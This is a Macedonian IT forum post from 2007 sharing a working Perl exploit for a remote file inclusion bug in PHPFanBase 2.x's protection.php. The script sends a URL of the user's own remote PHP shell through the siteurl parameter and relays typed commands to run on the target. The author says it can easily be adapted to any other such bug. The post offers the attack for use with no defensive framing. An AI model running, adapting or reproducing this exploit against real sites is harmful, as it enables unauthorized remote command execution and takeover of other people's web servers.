• Здраво и добредојдовте на форумот на IT.mk.

    Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.

[PERL] PHPFanBase 2.x (protection.php) RFI exploit

  • Ја почнал/а темата
  • #1

S

pwnz0r1lla
8 март 2007
1,550
52
www.it.com.mk
Ednostavna skripta za stariot PHPFanBase RFI bug koja lesno mozhe da se modificira i upotrebi za bilo koj drug RFI bug ...

[hl='perl']
#!/usr/bin/perl
#


use LWP::UserAgent;

while (@ARGV < 2) {
print "Usage: $0 <Vulnerable Site> <Your Evil phpshell>\n";
exit();
}

$vulnsite = $ARGV[0];
$phpshell = $ARGV[1];

while (1) {
print "Command to execute: ";
chomp($command = <STDIN>);
$age = LWP::UserAgent->new() || die;

$results = $age->request(HTTP::Request->new(GET=>$vulnsite.'/members/protection.php?action=logout&siteurl='.$phpshell.'?&cmd='.$command) || die);
$content = $results->content;

print $content;
}

# it.com.mk
[/hl]
 

Нови мислења

Последни Теми

Статистика

Теми
44,032
Мислења
854,810
Членови
29,640
Најнов член
Hellena09
На врв Дно